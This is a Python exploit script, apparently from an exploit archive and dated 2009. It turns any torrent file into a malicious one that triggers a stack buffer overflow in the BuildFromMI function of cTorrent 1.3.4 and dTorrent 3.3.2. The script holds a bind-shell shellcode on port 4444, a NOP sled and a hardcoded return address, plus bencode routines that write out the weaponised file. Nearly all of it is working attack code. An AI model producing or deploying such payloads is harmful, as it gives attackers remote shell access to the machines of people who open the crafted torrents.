cTorrent/DTorrent Buffer Overflow

`#!/usr/bin/python  
  
#Written By Michael Brooks  
#04/17/2009  
  
#Stack Based Buffer Overflow   
#The vulnerability is in the btFiles::BuildFromMI function   
#inside the btfiles.cpp file  
  
#Exploit tested on cTorrent 1.3.4 using Debian Sarge using Linux kernel 2.4.27-3-386  
#Can't get the exploit working on a modern linux kernel because of ASLR  
  
#code is using python 2.5  
  
#Home page for cTorrent 1.3.4:  
#http://sourceforge.net/projects/ctorrent/ 161,000+ Downloads  
#dTorrent 3.3.2 is also vulnerable:   
#http://sourceforge.net/projects/dtorrent/ 18,000+ downloads  
  
import sys  
import os  
#This code will take any torrent file and turn it into an exploit.   
USAGE="python exploit.py in_file.torrent out_file.torrent"  
  
def main():  
#Start of the program  
bfile=fileio()  
try:  
bad_torrent=bfile.read_bencode(sys.argv[1])  
except:  
print USAGE  
sys.exit()  
  
exploit_str=create_exploit()  
print("Writing Bytes:"+str(len(exploit_str)))  
bad_torrent["info"]["files"][0]["path"][0]=exploit_str  
try:  
bfile.write_bencode(sys.argv[2], bad_torrent)  
except:  
print USAGE  
sys.exit()  
  
def create_exploit():  
# linux_ia32_bind - LPORT=4444 Size=108 Encoder=PexFnstenvSub http://metasploit.com  
shellcode = "\x2b\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x27"  
shellcode += "\x1a\xbe\x4e\x83\xeb\xfc\xe2\xf4\x16\xc1\xed\x0d\x74\x70\xbc\x24"  
shellcode += "\x41\x42\x27\xc7\xc6\xd7\x3e\xd8\x64\x48\xd8\x26\x36\x46\xd8\x1d"  
shellcode += "\xae\xfb\xd4\x28\x7f\x4a\xef\x18\xae\xfb\x73\xce\x97\x7c\x6f\xad"  
shellcode += "\xea\x9a\xec\x1c\x71\x59\x37\xaf\x97\x7c\x73\xce\xb4\x70\xbc\x17"  
shellcode += "\x97\x25\x73\xce\x6e\x63\x47\xfe\x2c\x48\xd6\x61\x08\x69\xd6\x26"  
shellcode += "\x08\x78\xd7\x20\xae\xf9\xec\x1d\xae\xfb\x73\xce"  
  
#The exact address of our buffer is 0xbffffccc, which ebx tells us  
#however memeory changes before we control the eip,   
#so we change the addr to hit the NOP sled  
eip="\x11\xf1\xff\xbf"  
#eip="\xcc\xfc\xff\xbf"#the add ebx is holding  
  
#this is a dummy address to satisfy other pointer before we return  
#this cannot be the EIP becuase this location is written to!  
dumb_addr="\xcc\xfc\xff\xbf"  
  
#nop sled  
long_str="\x90"*(4028-len(shellcode))  
#memory around the shellcode is written to, but this is a safe place  
long_str+=shellcode  
#this 100byte buffer is written to before we control the eip  
long_str+="\x90"*100  
long_str+=eip#4128 bytes is the EIP!  
  
#This pointer must be real becuase it is written to in btFiles::BuildFromMI  
long_str+=dumb_addr#"this"   
#We can control these addresses but we don't need them  
#long_str+=dumb_addr#"metabuf"  
#long_str+=dumb_addr#"saveas"  
return long_str  
  
#Start of functions for bencoding:  
def BTFailure(msg):  
pass  
  
def decode_int(x, f):  
f += 1  
newf = x.index('e', f)  
n = int(x[f:newf])  
if x[f] == '-':  
if x[f + 1] == '0':  
raise ValueError  
elif x[f] == '0' and newf != f+1:  
raise ValueError  
return (n, newf+1)  
  
def decode_string(x, f):  
colon = x.index(':', f)  
n = int(x[f:colon])  
if x[f] == '0' and colon != f+1:  
raise ValueError  
colon += 1  
return (x[colon:colon+n], colon+n)  
  
def decode_list(x, f):  
r, f = [], f+1  
while x[f] != 'e':  
v, f = decode_func[x[f]](x, f)  
r.append(v)  
return (r, f + 1)  
  
def decode_dict(x, f):  
r, f = {}, f+1  
while x[f] != 'e':  
k, f = decode_string(x, f)  
r[k], f = decode_func[x[f]](x, f)  
return (r, f + 1)  
  
decode_func = {}  
decode_func['l'] = decode_list  
decode_func['d'] = decode_dict  
decode_func['i'] = decode_int  
decode_func['0'] = decode_string  
decode_func['1'] = decode_string  
decode_func['2'] = decode_string  
decode_func['3'] = decode_string  
decode_func['4'] = decode_string  
decode_func['5'] = decode_string  
decode_func['6'] = decode_string  
decode_func['7'] = decode_string  
decode_func['8'] = decode_string  
decode_func['9'] = decode_string  
  
def bdecode(x):  
try:  
r, l = decode_func[x[0]](x, 0)  
except (IndexError, KeyError, ValueError):  
raise BTFailure("not a valid bencoded string")  
if l != len(x):  
raise BTFailure("invalid bencoded value (data after valid prefix)")  
return r  
  
from types import StringType, IntType, LongType, DictType, ListType, TupleType  
  
  
class Bencached(object):  
  
__slots__ = ['bencoded']  
  
def __init__(self, s):  
self.bencoded = s  
  
def encode_bencached(x,r):  
r.append(x.bencoded)  
  
def encode_int(x, r):  
r.extend(('i', str(x), 'e'))  
  
def encode_bool(x, r):  
if x:  
encode_int(1, r)  
else:  
encode_int(0, r)  
  
def encode_string(x, r):  
r.extend((str(len(x)), ':', x))  
  
def encode_list(x, r):  
r.append('l')  
for i in x:  
encode_func[type(i)](i, r)  
r.append('e')  
  
def encode_dict(x,r):  
r.append('d')  
ilist = x.items()  
ilist.sort()  
for k, v in ilist:  
r.extend((str(len(k)), ':', k))  
encode_func[type(v)](v, r)  
r.append('e')  
  
encode_func = {}  
encode_func[Bencached] = encode_bencached  
encode_func[IntType] = encode_int  
encode_func[LongType] = encode_int  
encode_func[StringType] = encode_string  
encode_func[ListType] = encode_list  
encode_func[TupleType] = encode_list  
encode_func[DictType] = encode_dict  
  
try:  
from types import BooleanType  
encode_func[BooleanType] = encode_bool  
except ImportError:  
pass  
  
def bencode(x):  
r = []  
encode_func[type(x)](x, r)  
return ''.join(r)  
  
class fileio:  
def read_bencode(self,file):  
infile = open(file,"r")  
file=infile.read()  
infile.close  
return bdecode(file)  
  
#writes a dictionary to a bencoded file  
def write_bencode(self,file,dict):  
outfile = open(file, 'wb')  
outfile.write(bencode(dict))  
outfile.close()   
  
#execute main  
main()  
  
`